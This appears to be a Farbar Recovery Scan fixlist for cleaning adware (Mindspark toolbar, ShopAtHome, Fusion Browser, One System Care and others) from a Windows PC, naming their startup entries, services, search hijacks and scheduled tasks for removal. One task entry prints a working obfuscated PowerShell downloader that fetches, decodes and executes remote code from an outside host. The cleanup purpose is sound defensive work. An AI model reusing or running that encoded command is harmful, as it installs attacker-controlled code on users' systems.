CreateRestorePoint:
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe
(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe
(ShopAtHome.com) C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\APPINTEGRATOR.EXE
(Mindspark) C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
(The Chromium Authors) C:\Program Files\FusionBrowser\1.265.1\chrome.exe
() C:\Program Files (x86)\Get-a-Clip\MFLService2.exe
() C:\Program Files (x86)\Get-a-Clip\mflstart.exe
() C:\Program Files\WebUpdater\1.0.24.0\WebUpdater.exe
HKLM-x32\...\Run: [] => [X]
HKLM-x32\...\Run: [FromDocToPDF EPM Support] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65medint.exe [12872 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 32-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator.exe [225864 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF AppIntegrator 64-bit] => C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\AppIntegrator64.exe [258632 2015-02-11] (Mindspark)
HKLM-x32\...\Run: [FromDocToPDF Search Scope Monitor] => "C:\PROGRA~2\FROMDO~2\bar\1.bin\65srchmn.exe" /m=2 /w /h
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeWatcher] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeWatcher.exe [130232 2015-07-29] (ShopAtHome.com)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [ShopAtHomeUpdater] => C:\Users\Charlie\AppData\Roaming\ShopAtHome\ShopAtHomeHelper\ShopAtHomeUpdater.exe [199864 2015-07-29] (ShopAtHome.com)
HKU\S-1-5-21-1024156207-2972793060-2867319265-1000\...\Run: [FusionBrowser] => C:\Program Files\FusionBrowser\1.265.1\chrome.exe [622848 2015-12-02] (The Chromium Authors)
AppInit_DLLs-x32: mfllib.dll => No File
HKLM-x32\...\Run: [mflstart] => C:\Program Files (x86)\Get-a-Clip\mflstart.exe [116208 2016-01-10] ()
Winsock: Catalog9 01 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 02 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 03 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 04 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9 16 C:\Windows\SysWOW64\LavasoftTcpService.dll [345360 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 01 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 02 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 03 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 04 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Winsock: Catalog9-x64 16 C:\Windows\system32\LavasoftTcpService64.dll [425744 2016-01-10] (Lavasoft Limited)
Tcpip\..\Interfaces\{9381EA84-12A1-427D-AC6D-5FDEA744A58D}: [DhcpNameServer] 40.20.1.201 40.20.1.202
HKLM\SOFTWARE\Policies\Microsoft\Internet Explorer: Restriction <======= ATTENTION
URLSearchHook: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 - (No Name) - {4c60e5ab-5c68-4c59-abaa-885010b24b32} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll (Mindspark)
SearchScopes: HKLM-x32 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {9a216821-0ec5-49a3-85ac-fb72ae79a1e8} URL = hxxp://search.tb.ask.com/search/GGmain.jhtml?p2=^Y6^xdm003^YYA^us&si=CPTqgNak28MCFYNDaQodFm0ArQ&ptb=C7B3E8DB-D9F3-4E0E-ACA1-5E7ACDA2DFF2&ind=2015021120&n=781ac840&psa=&st=sb&searchfor={searchTerms}
SearchScopes: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> {AC00135D-B960-42EF-871F-3C8F42450A63} URL = hxxp://isearch.shopathome.com?user_id={a862d772-5a24-42bb-8804-35868a911247}&q={searchTerms}
BHO: HP Network Check Helper -> {E76FD755-C1BA-4DCB-9F13-99BD91223ADE} -> C:\Program Files (x86)\Hewlett-Packard\HP Support Framework\Resources\HPNetworkCheck\HPNetworkCheckPluginx64.dll => No File
BHO-x32: Toolbar BHO -> {a235e1e3-6296-4710-af39-104a7faa6c7c} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)
BHO-x32: MFLHelper Class -> {B0932222-51E2-47D1-A4EF-CB10AE7DF086} -> C:\Program Files (x86)\Get-a-Clip\MFLPluginIE.dll [2016-01-10] (Get-a-Clip)
BHO-x32: Search Assistant BHO -> {f236ca79-3123-4afb-9f74-e98117ad5625} -> C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65SrcAs.dll [2015-02-11] (Mindspark)
Toolbar: HKLM-x32 - FromDocToPDF - {c66a678d-5e6c-4af9-8f57-c6192f42cf74} - C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65bar.dll [2015-02-11] (Mindspark)
Toolbar: HKU\S-1-5-21-1024156207-2972793060-2867319265-1000 -> No Name - {47833539-D0C5-4125-9FA8-0819E2EAAC93} -  No File
FF Plugin: @microsoft.com/GENUINE -> disabled [No File]
FF Plugin-x32: @microsoft.com/GENUINE -> disabled [No File]
R2 FromDocToPDF_65Service; C:\Program Files (x86)\FromDocToPDF_65\bar\1.bin\65barsvc.exe [90696 2015-02-11] (Mindspark)
S2 Fusion Browser Startup Service; C:\Program Files\FusionBrowser\wdsvc2.exe [298496 2015-11-24] () [File not signed]
R2 MFLService2; C:\Program Files (x86)\Get-a-Clip\MFLService2.exe [1983640 2016-01-10] ()
S2 wusvc; C:\Program Files\WebUpdater\webupdaterservice.exe [61952 2015-12-30] (Web Updater Media) [File not signed]
2016-01-10 11:57 - 2016-01-10 11:57 - 00003824 _____ C:\Windows\System32\Tasks\WebUpdater Task
2016-01-10 11:57 - 2016-01-10 11:57 - 00000095 _____ C:\wulog.txt
2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\Users\Charlie\AppData\Local\WebUpdater
2016-01-10 11:57 - 2016-01-10 11:57 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\WebUpdater
2016-01-10 11:56 - 2016-01-10 12:06 - 00000000 ____D C:\Users\Charlie\AppData\Local\chrome
2016-01-10 11:56 - 2016-01-10 11:56 - 00004034 _____ C:\Windows\System32\Tasks\Fusion Browser Update Task
2016-01-10 11:56 - 2016-01-10 11:56 - 00003300 _____ C:\Windows\System32\Tasks\WebUpdater LaunchTask
2016-01-10 11:56 - 2016-01-10 11:56 - 00003280 _____ C:\Windows\System32\Tasks\Fusion Browser Launch Task
2016-01-10 11:56 - 2016-01-10 11:56 - 00000977 _____ C:\Users\Public\Desktop\Fusion Browser.lnk
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Users\Charlie\AppData\Local\FusionBrowser
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\WebUpdater
2016-01-10 11:56 - 2016-01-10 11:56 - 00000000 ____D C:\Program Files\FusionBrowser
2016-01-10 11:55 - 2016-01-10 11:55 - 00111600 _____ C:\Windows\SysWOW64\mfllib.dll
2016-01-10 11:55 - 2016-01-10 11:55 - 00023236 _____ C:\Windows\System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A}
2016-01-10 11:55 - 2016-01-10 11:55 - 00003572 _____ C:\Windows\System32\Tasks\One System Care Task
2016-01-10 11:55 - 2016-01-10 11:55 - 00003264 _____ C:\Windows\System32\Tasks\One System Care Monitor
2016-01-10 11:55 - 2016-01-10 11:55 - 00002860 _____ C:\Windows\System32\Tasks\One System CarePeriod
2016-01-10 11:55 - 2016-01-10 11:55 - 00001071 _____ C:\Users\Public\Desktop\Launch One System Care.lnk
2016-01-10 11:55 - 2016-01-10 11:55 - 00000280 _____ C:\Windows\Tasks\One System CarePeriod.job
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Users\Charlie\AppData\Roaming\One System Care
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\Microsoft\Windows\Start Menu\Programs\One System Care
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-5c45-1
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\ProgramData\edc8d5e4-02f5-0
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\OneSystemCare
2016-01-10 11:55 - 2016-01-10 11:55 - 00000000 ____D C:\Program Files (x86)\Get-a-Clip
C:\Program Files (x86)\FromDocToPDF_65
C:\Users\Charlie\AppData\Roaming\ShopAtHome
Task: {0C2051A4-532A-4C92-B62F-81876D901712} - System32\Tasks\Fusion Browser Update Task => Chrome.exe --sch-update
Task: {4F27F764-3DF6-41E2-B13E-C181E52BD9FE} - System32\Tasks\{780E0B47-7A78-0A0E-0911-0B79050F110A} => powershell.exe -nologo -executionpolicy bypass -noninteractive -windowstyle hidden -EncodedCommand JABFAHIAcgBvAHIAQQBjAHQAaQBvAG4AUAByAGUAZgBlAHIAZQBuAGMAZQA9ACIAcwB0AG8AcAAiADsAJABzAGMAPQAiAFMAaQBsAGUAbgB0AGwAeQBDAG8AbgB0AGkAbgB1AGUAIgA7ACQAVwBhAHIAbgBpAG4AZwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFAAcgBvAGcAcgBlAHMAcwBQAHIAZQBmAGUAcgBlAG4AYwBlAD0AJABzAGMAOwAkAFYAZQByAGIAbwBzAGUAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsAJABEAGUAYgB1AGcAUAByAGUAZgBlAHIAZQBuAGMAZQA9ACQAcwBjADsACgBmAHUAbgBjAHQAaQBvAG4AIABzAHIAKAAkAHAAKQB7ACQAbgA9ACIAVwBpAG4AZABvAHcAUABvAHMAaQB0AGkAbwBuACIAOwB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAcAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0AYwBhAHQAYwBoAHsAfQB0AHIAeQB7AE4AZQB3AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFAAcgBvAHAAZQByAHQAeQBUAHkAcABlACAARABXAE8AUgBEACAALQBWAGEAbAB1AGUAIAAyADAAMQAzADIAOQA2ADYANAB8AE8AdQB0AC0ATgB1AGwAbAA7AH0ACgBjAGEAdABjAGgAewB0AHIAeQB7AFMAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIAAtAFAAYQB0AGgAIAAkAHAAIAAtAE4AYQBtAGUAIAAkAG4AIAAtAFYAYQBsAHUAZQAgADIAMAAxADMAMgA5ADYANgA0AHwATwB1AHQALQBOAHUAbABsADsAfQBjAGEAdABjAGgAewB9AH0AfQBzAHIAKAAiAEgASwBDAFUAOgBcAEMAbwBuAHMAbwBsAGUAXAAlAFMAeQBzAHQAZQBtAFIAbwBvAHQAJQBfAFMAeQBzAHQAZQBtADMAMgBfAFcAaQBuAGQAbwB3AHMAUABvAHcAZQByAFMAaABlAGwAbABfAHYAMQAuADAAXwBwAG8AdwBlAHIAcwBoAGUAbABsAC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAJQBTAHkAcwB0AGUAbQBSAG8AbwB0ACUAXwBTAHkAcwB0AGUAbQAzADIAXwBzAHYAYwBoAG8AcwB0AC4AZQB4AGUAIgApADsAcwByACgAIgBIAEsAQwBVADoAXABDAG8AbgBzAG8AbABlAFwAdABhAHMAawBlAG4AZwAuAGUAeABlACIAKQA7AAoAJABzAHUAcgBsAD0AIgBoAHQAdABwADoALwAvAGMAbwBuAHQAZQB4AGYAaQB4AC4AaQBuAGYAbwAvAHUALwA/AGEAPQA2AEUARQB4AFkAdgAtADkAMQBfAHAANQBvAHUAZwB6AEIAbwAyAGsAbwBlADIAQwBhAGoARQBmAHEAVwBQAHEAUwBFADUASQBXAHEAMQBtAE8AWQBVAFEATABRAEIAdQBhAEMANQBDAGYAMAB5AFcAZwAwAFUASABfAE8AcgAwADQAbQBMAGwAVAAxAGwAaABqAFQATQBtAGEAUQBHAGUARgBaAHMAZQBXAGYARQB5AGgAVQBnAEkANABoAFgAcgA1AHgAagBCAHcATAB1AGUAcABWAGsAeQBZAHoAUwBnAHYASQBTAEcARgBFAFoASQBTAFgAZwBNAEEAcgB3AFMAQQBYAGQAbQBIAGgAcwBiAGYATQBRAFEAVgBDAFYAVgBiAF8AVQBNAEIANgB1AE4AdABZADcAcwBLAHkAMQA3AF8AVQA3AEwAbwB4AFEAegBrAEsAeABJAGYAMwBQAFMAcAA4ADMANwAwAHYAUgBVAGIAbgBBAHQAQQBVAEIATABWAGUAbQBVAHMAZQBxAEkAdwB5AHIATwBLAGQAYgBaAG8AOABaAHgAMgBfAGwAWgAzAGwAMQBVAE0ATQBUAG4AWQBpAHUAdgBKAC0ANgA1AEUALQBsAFcAeAAzAEgAMAB4AE4ARQAzAHoAMAAyAEMAQQBiAEkAUgBnAHUAZgAyAFcAMQBGAEwAbABDAGsAQwAtADYATgBmAE0ALQBkADMAcwBkAHgAaABjAFAAdABqAGEAUABPAEYAdABCAHAAdgBCAC0ALQBIAGIARwB4AG0ATQBTAEgAagAxAGEAOQByAGgAYgBNAGcAbwBUAEYAbgBVAGUAXwA5AFAAeABqAC0AaABlAFUAYgB3ADUAWQBrAHQAQQAyAHkATQBtAEkAdABDAEIAawBIAHgAUABZADkASgBXAFgASwBJAC0AVgBfAEMASQBpAHMAQQB0AE4AcgBLAGgAWAA2AGoASgB5AFgAZQBKAHQAUABkAEsAUABOAGkAegA1AG4AMQBCAEgAbgB1AHYAVABrAHgAdgB6AFcAWQBuAFEANwBZAFcAdQBrADQAQwBtAEUAMQBvAGwAeABGADEAcgBJAEQAbgA5AFUARABTAFgAYgBxAGcAYQBsAGUASQBNAGYAZwBlAEYAbgBNAGwAVwBSAEgAaABJAFkAXwBPAHUAbQA2AG0AQQAxAHcAQQBKAFcAVgA2AHMASQBHAFQAMwBYAGUASgBWAFQAawBkADUAUQBWAFkAcgBlADYAcQByAHcASQBNAHIAbAB1AFQANAAtAF8AMAA5ADMANgBMAEwAaQBxAEgAdQBjAG4AUwBWAF8AZQBtAE8AYwBEAHQAYwBLAEEAbQBTAEoAWgBNADQAZgBLADMAMABoAGsARQBtAG4ANwA3AHAAYQB6AHYAWgBBADYASwAtAFEAZwBCAG8AYgBkAHoATABzAGYAdQBmAE0ANgBQAEUAMwBhADIATABIAE4AWQBxAGsAQwA0ADAAdwBSADUAZgA0ADUAMwBNAG8AUABnAC0AZwAxAGIAVwBVAGQANgBXAFoAaAAzAHkAcABxAC0AZgBVAGsARQA5AHYASQBkAHoAYQBlAHYATwBaAFMAMgBSAE0AdgB3AHMAdQBjADEAeABOAGgAZABDAEkAQgA5AGQARQBDAEEAUAA5ADgAegBYAHoAVgBUAG8AaABMAEwAOAB1AG8ALQBuAG8AMABHAGYARwBkAFQATgBaAHoAQQBZAE4ARABDAFoAcQBnAFgAUwBJAHUAVQA0ADcAVABWAE4AawAxAFAAegBKAHUAaQBhADMAVABsAFUATgB0AG0AQQAtAFMAMwBQAE8AVwBmAEsAUgBVAFUATQA1AGYAcwA4AEcAVgBkAGIAUwBIAG4AZQB1AFEARwBTADYAUQB3AGsAUQB1AFcAaABnADEAcwB6AGUAcgBXAHgAdAB3AHoATQBRAEkASgA4AG0ALQAtAHYASQBRAEIAQgBJAGgAUgBDAGsARQBpAEYASwBzAE0AaAA2AGYAVwBlAGMANQBFAFcAYQBnAG0AcwBCADgATwBMAGgAcAB2ADYAawAxAEoAQwBaAEUAQwA0ADMARgAtAFAAZwBQAHcAdQB1AGYAbwBiAEwANABaAEgANwBJAHoAcQBIAE4ATQB4AGYAeQBSADYAbABhAFgAUABWAHAAZwBrAGoAegBjAEMAOABNAFcAWQBjADAANgBVAHMAbQBvAHgARgA0AHgAcQBLAEkAbQBGADgAUQBvAHUATABNAHMAQwBRAGYAZgB3AGkASABZAEcAeABfAEUAWQB5AEYAYgBhAE4AcQBfAHYAWQAxAGoAOABuAFQAbABhAGUAawA1AG8AcwBuAE8ATwBCAGEAcgBEAEMAJgBjAD0AcAA5AHoAbwByAHQARgBvADUAVQA2AFYASwB5AGwAbAA2AFYAZAAwADcARgAtADkAQQBiADYARwBoAGIAawBHAFoAcABwAGoAZwBJAFMAaQBoAGEAQgBNAHEAbAA2AHUAeABVAGgAQwBTAFgAZwBZADAAaQBLAHAAYgB4AG8ASgB4AGoAegBoAHEAcwBMAFQAdwB6AGUAQgBKAGgAegBUADQANQBPAGoAVABSAG8ASgA5AF8AUwBkAHIAUwBLAHoAOQA5AFgAQQB0AGkALQB2ADMAQQBIAHAATAAxAFkAWABfAC0AXwA0AFcASQBlAHoATABhAGQAaABDAFkAOQBJAGwAUwB4AG8AQgA1ADQASABiAEcAZgBBAGYATABIAGMAZgBDAE4AdgBuAGwAbgBzAEIAVAB3AGIARQB6AGwATQBnAFIAUwBpADAAbgBQAGgAMABkAEUAawBCAG8AZwBvADIAOQBrAGoAZgBtADQAeAAzAEMAQgAxAE4ARgBqAGwAdABwAE0AVQBoADUAWQBlAG4AVwA0AHoANAA1AHEALQB0AFoARwAxAHYAQwAxADAAVwBwAHcAYQBiAHgAOQBRAHUAUwBmAHUAeABWAEwARQBSAE8AMQA3AC0AMABEAFYAZQBHAE4ANABmAHYAMwBmAGcAVgBfAEYAZgBQADgAZQAxAE0AYgBDAHoAUgBnAHgAaQBRAFAALQBiAEwAYgB1AHcAcgBtAE4ASAAxADkAQgB0AGgATQByAEUATQBwAEUASQBvADQAMABSAFoAQwBWADYAWQBHADYAMQBTAGwAOABhADMAOQBzAGEAdgBtAHIAXwBfAFoAaQB5ADkARwBwAGIATgBrAHkAWgBCAEIAdgBvAHgAegB6AEEAdwBrAFIAZQBxAFIAOABiAFcAdgB1AEgAUgBEAHYAZwA4AC0AYQBOAHIAaQA0AFgAMABMADUARwBqAFUAdABzAFMAWQA2AHQAOQBRAHUATwBUAHEATQBOAEEAWAAxAGUAdwByAE0AawBfAGEARwBiAHYATQA4AHoAXwB1AGoAcQBoAHQATAA4AGQAeQBSAEIANgAwAFMAZABYAEwAUgA4AHAAcgBkAGoAWQBDAHQAMwB6AEUAZABUAHIARAA0AGoAUwBsAEQAVwBWADQAWQAtAEQAbABwAGMANwBZAEgAawBtAGUATABxAHcAWABJAGkAbQB2ADcARQBWAFEAWQByAHUAegAyAFkAVwBnADgAbwB1AGsAQQA3AHkANQBoAHEAWgB5AGQAcQBZAEsAQwAwAFcAZwBjAHUATABGAFIAawA2AGQARABfAC0AYwB3AG8ANABIAHMAMQBmAHIAWABlAFQAUABxAFkAcwBJAFgATgBQAG0AMQBNAEEAegAzAHgAUgBnADMAVQA4ADQAdQBnAGMAbABPAEMAOAByAG8ATQA1AFYAVwBfAEsAVgByAEoAYQBsADMAWQBuAHcAbgBGADgALQAyAFkAZwBoAHkAMABKAEgANwBHAHYAYQBrAEwAaQBTAHAAVwBQADIAXwAtAFcATABPAHkAZQBfADUAWgA5AGkAcQBhAEQAWQBBAHoAdwBkAG4AUAB6ADMAagBZAE8ATABQAHYAQgB3AEcAbQBtAEMAMgBHAG4ATABCAGgAbAB3AGMAVwBFAGkAMwA4AGQATABtAEQAZgBWAE8AUABLADkAUABEAEgAWgBOAGQAawBvAHoAYQBTAGQAYQB4AHAAMQBZAFUAaAAzADEAZQBjAFIAYwB6AFIASwBqAG4AXwBlADgAVABhAHgAbgBMADgAVQBiADcAWAA2AHQARgBHAC0AUQBSAEsAXwBwADEASgA0AGwAUQB2ADkAYQBVAE4AMwBRAEMANwBjAHIAVwBxAHIAUwBrAEwAZwBoAHAAOQBSAEEANABUAFUALQBJAHgAZABwADEAWABwAGQAYgBKADgAMwB5AHAAaABfAEQAdABTADEARQBjAGMAUQBxAHYAZABGAFAAVQBRAFAAYgB2AHgAUQA0AHkAUAB2AE0AVABhAEIASgBEAEwAUgB1ADQAawAtAE0AdQAyAC0AUgBvAEwAeQBJAEgANQB3ADIAZABiAGgAUAA0AGsAaABiAEkAbgBvAFQAeABSAE4ARQBVAFgANgA1ADEAOABlAHIARABCAEQAQgBNAFIAUgBRAEgAcQBBAEIATQBUAFEAMwB1AFoASQA5AGcANQBlAHEATABmAC0ALQBfAEEASQBuAEQAcwBzAEYAVQBBAFYAcQBQAEcAOAB4AEUAVwBPAEQAeQBrAGwAcQB0AC0AVgB6ADcATQBrAHEANABOAFYAMwBqADYAMQAtAEMAOQBwAHEAVABiADYAYgAzAFoAdwBaAEgARQBwAHUAWAAwAEUATgBDAGYAXwBpAHMATgBMAGIAdABpAG8ASAByADkAUAB0ADkAWABjAEoAOABXADQATABfAHIAUwBQAE8AVgA3AGcAeAB2AFgARgBZAFMAbABHAGcARwBpADEAZABYAHcAeQBKACYAcgA9ADQAMAA5ADQAMQA5ADMAOAA4ADMAMwA3ADAAOAA4ADYANwAzADUAIgA7ACQAcwB0AHMAawA9ACIAewA3ADgAMABFADAAQgA0ADcALQA3AEEANwA4AC0AMABBADAARQAtADAAOQAxADEALQAwAEIANwA5ADAANQAwAEYAMQAxADAAQQB9ACIAOwAkAHAAcgBpAGQAPQAiAE8AbgBlAFMAeQBzAHQAZQBtAEMAYQByAGUAIgA7ACQAaQBuAGkAZAA9ACIATABVAFIATgBVAEoAVABHACIAOwB0AHIAeQB7AGkAZgAoACQAUABTAFYAZQByAHMAaQBvAG4AVABhAGIAbABlAC4AUABTAFYAZQByAHMAaQBvAG4ALgBNAGEAagBvAHIAIAAtAGwAdAAgADIAKQB7AGIAcgBlAGEAawA7AH0AJAB2AD0AWwBTAHkAcwB0AGUAbQAuAEUAbgB2AGkAcgBvAG4AbQBlAG4AdABdADoAOgBPAFMAVgBlAHIAcwBpAG8AbgAuAFYAZQByAHMAaQBvAG4AOwAKAGkAZgAoACQAdgAuAE0AYQBqAG8AcgAgAC0AZQBxACAANQApAHsAaQBmACgAKAAkAHYALgBNAGkAbgBvAHIAIAAtAGwAdAAgADIAKQAgAC0AQQBOAEQAIAAoACgARwBlAHQALQBXAG0AaQBPAGIAagBlAGMAdAAgAFcAaQBuADMAMgBfAE8AcABlAHIAYQB0AGkAbgBnAFMAeQBzAHQAZQBtACkALgBTAGUAcgB2AGkAYwBlAFAAYQBjAGsATQBhAGoAbwByAFYAZQByAHMAaQBvAG4AIAAtAGwAdAAgADIAKQApAHsAYgByAGUAYQBrADsAfQB9AAoAaQBmACgALQBOAE8AVAAgACgAWwBTAGUAYwB1AHIAaQB0AHkALgBQAHIAaQBuAGMAaQBwAGEAbAAuAFcAaQBuAGQAbwB3AHMAUAByAGkAbgBjAGkAcABhAGwAXQBbAFMAZQBjAHUAcgBpAHQAeQAuAFAAcgBpAG4AYwBpAHAAYQBsAC4AVwBpAG4AZABvAHcAcwBJAGQAZQBuAHQAaQB0AHkAXQA6ADoARwBlAHQAQwB1AHIAcgBlAG4AdAAoACkAKQAuAEkAcwBJAG4AUgBvAGwAZQAoAFsAUwBlAGMAdQByAGkAdAB5AC4AUAByAGkAbgBjAGkAcABhAGwALgBXAGkAbgBkAG8AdwBzAEIAdQBpAGwAdABJAG4AUgBvAGwAZQBdACAAIgBBAGQAbQBpAG4AaQBzAHQAcgBhAHQAbwByACIAKQApAHsAYgByAGUAYQBrADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAHcAYwAoACQAdQByAGwAKQB7ACQAcgBxAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAFMAeQBzAHQAZQBtAC4ATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAA7ACQAcgBxAC4AVQBzAGUARABlAGYAYQB1AGwAdABDAHIAZQBkAGUAbgB0AGkAYQBsAHMAPQAkAHQAcgB1AGUAOwAkAHIAcQAuAEgAZQBhAGQAZQByAHMALgBBAGQAZAAoACIAdQBzAGUAcgAtAGEAZwBlAG4AdAAiACwAIgBNAG8AegBpAGwAbABhAC8ANAAuADAAIAAoAGMAbwBtAHAAYQB0AGkAYgBsAGUAOwAgAE0AUwBJAEUAIAA3AC4AMAA7ACAAVwBpAG4AZABvAHcAcwAgAE4AVAAgADYALgAxADsAKQAiACkAOwByAGUAdAB1AHIAbgAgAFsAUwB5AHMAdABlAG0ALgBUAGUAeAB0AC4ARQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQAuAEcAZQB0AFMAdAByAGkAbgBnACgAJAByAHEALgBEAG8AdwBuAGwAbwBhAGQARABhAHQAYQAoACQAdQByAGwAKQApADsAfQAKAGYAdQBuAGMAdABpAG8AbgAgAGQAcwB0AHIAKAAkAHIAYQB3AGQAYQB0AGEAKQB7ACQAYgB0AD0AWwBDAG8AbgB2AGUAcgB0AF0AOgA6AEYAcgBvAG0AQgBhAHMAZQA2ADQAUwB0AHIAaQBuAGcAKAAkAHIAYQB3AGQAYQB0AGEAKQA7ACQAZQB4AHQAPQAkAGIAdABbADAAXQA7ACQAawBlAHkAPQAkAGIAdABbADEAXQAgAC0AYgB4AG8AcgAgADEANwAwADsAZgBvAHIAKAAkAGkAPQAyADsAJABpACAALQBsAHQAIAAkAGIAdAAuAEwAZQBuAGcAdABoADsAJABpACsAKwApAHsAJABiAHQAWwAkAGkAXQA9ACgAJABiAHQAWwAkAGkAXQAgAC0AYgB4AG8AcgAgACgAKAAkAGsAZQB5ACAAKwAgACQAaQApACAALQBiAGEAbgBkACAAMgA1ADUAKQApADsAfQAKAHIAZQB0AHUAcgBuACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAFMAdAByAGUAYQBtAFIAZQBhAGQAZQByACgATgBlAHcALQBPAGIAagBlAGMAdAAgAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEQAZQBmAGwAYQB0AGUAUwB0AHIAZQBhAG0AKAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABJAE8ALgBNAGUAbQBvAHIAeQBTAHQAcgBlAGEAbQAoACQAYgB0ACwAMgAsACgAJABiAHQALgBMAGUAbgBnAHQAaAAtACQAZQB4AHQAKQApACkALABbAEkATwAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgAuAEMAbwBtAHAAcgBlAHMAcwBpAG8AbgBNAG8AZABlAF0AOgA6AEQAZQBjAG8AbQBwAHIAZQBzAHMAKQApACkALgBSAGUAYQBkAFQAbwBFAG4AZAAoACkAOwB9AAoAJABzAGMAPQBkAHMAdAByACgAdwBjACgAJABzAHUAcgBsACkAKQA7AEkAbgB2AG8AawBlAC0ARQB4AHAAcgBlAHMAcwBpAG8AbgAgAC0AYwBvAG0AbQBhAG4AZAAgACIAJABzAGMAIgA7AH0AYwBhAHQAYwBoAHsAfQA7AGUAeABpAHQAIAAwADsA
Task: {51C95B35-225E-452C-9301-234846811C7B} - System32\Tasks\Fusion Browser Launch Task => Chrome.exe --sch-launch --docked
Task: {8DBAF71D-D981-4D7F-8D96-90E4F3566220} - System32\Tasks\WebUpdater Task => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)
Task: {8F71346F-9754-43AE-A404-6A5F027FC396} - System32\Tasks\One System CarePeriod => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe [2015-12-29] () <==== ATTENTION
Task: {B68388AB-C415-428A-B356-E4BFC84963A3} - System32\Tasks\One System Care Task => C:\Program Files (x86)\OneSystemCare\SystemConsole.exe [2015-12-29] () <==== ATTENTION
Task: {C85EF2F7-128A-4947-B39D-03AEE0EF3196} - System32\Tasks\One System Care Monitor => C:\Program Files (x86)\OneSystemCare\CleanupConsole.exe [2015-12-29] () <==== ATTENTION
Task: {CE9E7981-1275-407B-BBB4-40497F96FB2C} - System32\Tasks\WebUpdater LaunchTask => C:\Program Files\WebUpdater\webupdaterservice.exe [2015-12-30] (Web Updater Media)
Task: C:\Windows\Tasks\One System CarePeriod.job => C:\Program Files (x86)\OneSystemCare\OneSystemCare.exe <==== ATTENTION
